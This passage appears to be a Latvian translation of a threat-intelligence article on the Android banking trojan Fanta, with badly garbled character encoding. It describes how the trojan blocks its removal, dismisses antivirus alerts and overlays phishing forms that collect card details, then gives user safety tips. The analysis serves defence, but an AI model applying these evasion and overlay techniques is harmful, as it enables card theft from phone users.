- MÄÄ£inot atÅemt Trojas zirgam administratora tiesÄ«bas, tas bloÄ·Ä tÄlruÅa ekrÄnu.
- Neļauj pievienot jaunus administratorus.
- Ja pretvÄ«rusu lietojumprogramma dr.web atklÄja draudus, Fanta atdarina pogas nospieÅ”anu ignorÄt.
- Trojas zirgs simulÄ pogas Atpakaļ un SÄkums nospieÅ”anu, ja notikumu Ä£enerÄja lietojumprogramma Samsung ierÄ«Äu kopÅ”ana.
- Fanta izveido pikŔķerÄÅ”anas logus ar veidlapÄm informÄcijas ievadÄ«Å”anai par bankas kartÄm, ja tika palaista aplikÄcija no aptuveni 30 dažÄdu interneta pakalpojumu saraksta. Starp tiem: AliExpress, Booking, Avito, Google Play tirgus komponents, Pandao, Drom Auto utt.
PikŔķerÄÅ”anas veidlapas
Fanta analizÄ, kuras lietojumprogrammas darbojas inficÄtajÄ ierÄ«cÄ. Ja tika atvÄrta interesÄjoÅ”Ä lietojumprogramma, Trojas zirgs virs visiem citiem parÄda pikŔķerÄÅ”anas logu, kas ir veidlapa bankas kartes informÄcijas ievadÄ«Å”anai. LietotÄjam jÄievada Å”Ädi dati:
- Kartes numurs
- Kartes derÄ«guma termiÅÅ”
- CVV
- Kartes Ä«paÅ”nieka vÄrds (ne visÄm bankÄm)
AtkarÄ«bÄ no darbojoÅ”Äs lietojumprogrammas tiks parÄdÄ«ti dažÄdi pikŔķerÄÅ”anas logi. TÄlÄk ir sniegti dažu no tiem piemÄri:
AliExpress:
Avito:
Dažiem citiem lietojumiem, piemÄram, Google Play tirgus, Aviasales, Pandao, rezervÄÅ”ana, Trivago:
KÄ tas Ä«sti bija
Par laimi, persona, kas saÅÄma raksta sÄkumÄ aprakstÄ«to SMS Ä«sziÅu, izrÄdÄ«jÄs kiberdroŔības speciÄlists. TÄpÄc Ä«stÄ, nerežisora āāversija atŔķiras no iepriekÅ” stÄstÄ«tÄs: cilvÄks saÅÄma interesantu SMS, pÄc kuras viÅÅ” to nodeva Grupas-IB draudu medÄ«bu izlÅ«koÅ”anas komandai. Uzbrukuma rezultÄts ir Å”is raksts. LaimÄ«gas beigas, vai ne? TomÄr ne visi stÄsti beidzas tik veiksmÄ«gi, un, lai jÅ«sÄjais neizskatÄ«tos pÄc režisora āāgriezuma ar naudas zaudÄjumiem, vairumÄ gadÄ«jumu pietiek ar Å”Ädu sen aprakstÄ«to noteikumu ievÄroÅ”anu:
- neinstalÄjiet lietojumprogrammas mobilajÄm ierÄ«cÄm ar Android OS no citiem avotiem, izÅemot Google Play
- InstalÄjot lietojumprogrammu, pievÄrsiet Ä«paÅ”u uzmanÄ«bu lietojumprogrammas pieprasÄ«tajÄm tiesÄ«bÄm
- pievÄrsiet uzmanÄ«bu lejupielÄdÄto failu paplaÅ”inÄjumiem
- regulÄri instalÄjiet Android OS atjauninÄjumus
- neapmeklÄjiet aizdomÄ«gos resursus un nelejupielÄdÄjiet no turienes failus
- NeklikŔķiniet uz saitÄm, kas saÅemtas Ä«sziÅÄs.
Avots: www.habr.com